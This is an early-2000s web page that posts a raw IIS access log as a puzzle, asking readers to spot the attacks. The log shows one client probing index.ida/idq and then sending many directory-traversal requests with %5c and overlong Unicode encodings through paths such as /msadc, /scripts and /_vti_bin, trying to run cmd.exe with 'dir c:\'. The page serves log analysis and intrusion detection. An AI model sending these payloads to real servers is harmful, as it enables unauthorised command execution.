January 11, 2002
This is a copy of our IIS log for one of our web
servers. Can you guess the attacks
performed here? If so, email us at mrcorp@mrcorp.net.
2002-01-11 16:39:25 212.195.2.148 - 68.37.60.44
80 HEAD /index.htm - 200 274 230 50 68.37.60.44 -
2002-01-11 16:39:27 212.195.2.148 - 68.37.60.44
80 HEAD /index.htm - 200 274 230 10 68.37.60.44 -
2002-01-11 16:39:27 212.195.2.148 - 68.37.60.44
80 GET /index.idc - 404 95 238 50 68.37.60.44 -
2002-01-11 16:39:28 212.195.2.148 - 68.37.60.44
80 GET /index.idw - 404 3396 238 30 68.37.60.44 -
2002-01-11 16:39:29 212.195.2.148 - 68.37.60.44
80 GET /index.ida - 200 158 238 20 68.37.60.44 -
2002-01-11 16:39:29 212.195.2.148 - 68.37.60.44
80 GET /index.idq - 200 158 238 20 68.37.60.44 -
2002-01-11 16:39:31 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
301 20 68.37.60.44 -
2002-01-11 16:39:32 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 298 21 68.37.60.44 -
2002-01-11 16:39:33 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 304 10 68.37.60.44 -
2002-01-11 16:39:34 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 310 20 68.37.60.44 -
2002-01-11 16:39:35 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 296 10 68.37.60.44 -
2002-01-11 16:39:36 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 296 10 68.37.60.44 -
2002-01-11 16:39:37 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 304 10 68.37.60.44 -
2002-01-11 16:39:37 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 312 10 68.37.60.44 -
2002-01-11 16:39:42 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 309 0 68.37.60.44 -
2002-01-11 16:39:43 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 309 10 68.37.60.44 -
2002-01-11 16:39:43 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 319 0 68.37.60.44 -
2002-01-11 16:39:44 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 329 0 68.37.60.44 -
2002-01-11 16:39:44 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 292 20 68.37.60.44 -
2002-01-11 16:39:46 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 292 20 68.37.60.44 -
2002-01-11 16:39:47 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 298 20 68.37.60.44 -
2002-01-11 16:39:48 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 304 20 68.37.60.44 -
2002-01-11 16:39:49 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:39:50 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:39:51 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 280 20 68.37.60.44 -
2002-01-11 16:39:52 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 293 20 68.37.60.44 -
2002-01-11 16:39:54 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 299 20 68.37.60.44 -
2002-01-11 16:39:55 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
281 20 68.37.60.44 -
2002-01-11 16:39:56 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
280 20 68.37.60.44 -
2002-01-11 16:39:57 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:00 212.195.2.148 - 68.37.60.44
80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:00 212.195.2.148 - 68.37.60.44
80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:02 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 10 68.37.60.44 -
2002-01-11 16:40:02 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 10 68.37.60.44 -
2002-01-11 16:40:03 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
281 20 68.37.60.44 -
2002-01-11 16:40:04 212.195.2.148 - 68.37.60.44
80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\
404 3396 281 20 68.37.60.44 -
2002-01-11 16:40:05 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
284 20 68.37.60.44 -
2002-01-11 16:40:06 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:40:07 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 290 20 68.37.60.44 -
2002-01-11 16:40:11 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 293 20 68.37.60.44 -
2002-01-11 16:40:12 212.195.2.148 - 68.37.60.44
80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
500 0 284 0 68.37.60.44 -
2002-01-11 16:40:12 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
303 20 68.37.60.44 -
2002-01-11 16:40:14 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
303 20 68.37.60.44 -
2002-01-11 16:40:15 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -
2002-01-11 16:40:16 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 30 68.37.60.44 -
2002-01-11 16:40:17 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -
2002-01-11 16:40:18 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -